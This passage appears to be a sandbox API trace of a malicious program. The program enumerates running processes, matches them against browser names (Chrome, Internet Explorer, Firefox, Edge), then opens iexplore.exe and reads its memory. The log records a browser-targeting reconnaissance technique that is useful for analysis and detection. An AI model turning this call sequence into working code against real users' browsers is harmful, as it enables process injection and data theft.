	[0232.173] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0232.174] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.174] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.174] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.174] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0232.174] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.174] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.175] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0232.187] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x6cd4
	[0232.187] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.187] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0232.188] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.188] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.188] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.188] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0232.188] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.188] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.188] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0232.189] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x6cd8
	[0232.189] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.189] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0232.190] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.190] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.190] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.190] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0232.190] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.190] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.190] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0232.191] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x6cdc
	[0232.192] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.192] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0232.192] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.192] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.192] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.192] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0232.193] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.193] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.193] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0232.194] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x6ce0
	[0232.194] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.194] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0232.194] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.194] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.194] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.194] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0232.195] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.195] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.195] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0232.196] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x6ce4
	[0232.196] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.196] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0232.196] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.196] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.197] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.197] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0232.197] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.197] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.197] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0232.198] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x6ce8
	[0232.198] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.198] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0232.198] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.198] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.198] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.198] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0232.199] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.199] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.199] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0232.200] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x6cec
	[0232.200] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.200] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0232.200] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.200] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.200] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.200] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0232.201] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.201] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.201] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0232.202] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0232.202] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0232.202] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x6cf0
	[0232.203] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.203] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0232.203] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.203] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.204] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.204] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0232.204] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.204] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.205] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0232.206] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x6cf4
	[0232.206] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.206] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0232.206] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.206] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.206] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.206] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0232.207] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.207] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.207] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0232.208] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x6cf8
	[0232.208] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.208] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0232.208] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.208] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.208] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.209] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0232.209] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.209] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.209] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0232.210] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x6cfc
	[0232.210] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.210] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0232.210] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.210] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.211] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.211] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0232.211] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.211] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.211] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0232.212] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x6d00
	[0232.212] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.212] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0232.213] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.213] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.213] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.213] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0232.214] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.214] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.214] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0232.215] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x6d04
	[0232.215] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.215] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0232.215] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.215] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.216] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.216] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0232.216] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.216] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.216] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0232.217] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x6d08
	[0232.217] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.217] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0232.217] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.217] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.218] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.218] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0232.218] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.218] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.219] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0232.219] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x6d0c
	[0232.220] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.220] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0232.220] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.220] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.221] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.221] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0232.221] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.221] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.221] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0232.263] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x6d10
	[0232.263] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.263] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0232.263] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.263] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.263] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.263] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0232.264] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.264] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.264] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0232.264] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x6d14
	[0232.265] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.265] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0232.265] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.265] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.265] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.265] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0232.265] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.265] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.266] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0232.266] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x6d18
	[0232.267] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.267] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0232.267] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.267] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.267] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.268] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0232.268] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.268] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.268] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0232.269] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x6d1c
	[0232.269] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.269] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0232.270] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.270] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.271] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.271] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0232.271] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.271] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.272] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0232.272] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x6d20
	[0232.273] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.273] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0232.273] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.273] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.274] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.274] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0232.274] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.274] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.274] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0232.275] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x6d24
	[0232.275] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.275] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0232.276] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.276] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.276] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.277] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0232.277] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.277] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.278] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0232.278] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x6d28
	[0232.279] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.279] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0232.279] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.279] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.280] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.280] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0232.280] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.280] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.280] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0232.281] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x6d2c
	[0232.281] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.281] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0232.282] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.282] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0232.282] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.282] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0232.282] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.282] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.282] NtQueryInformationProcess (in: ProcessHandle=0x6d2c, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0232.283] ReadProcessMemory (in: hProcess=0x6d2c, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0232.283] ReadProcessMemory (in: hProcess=0x6d2c, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
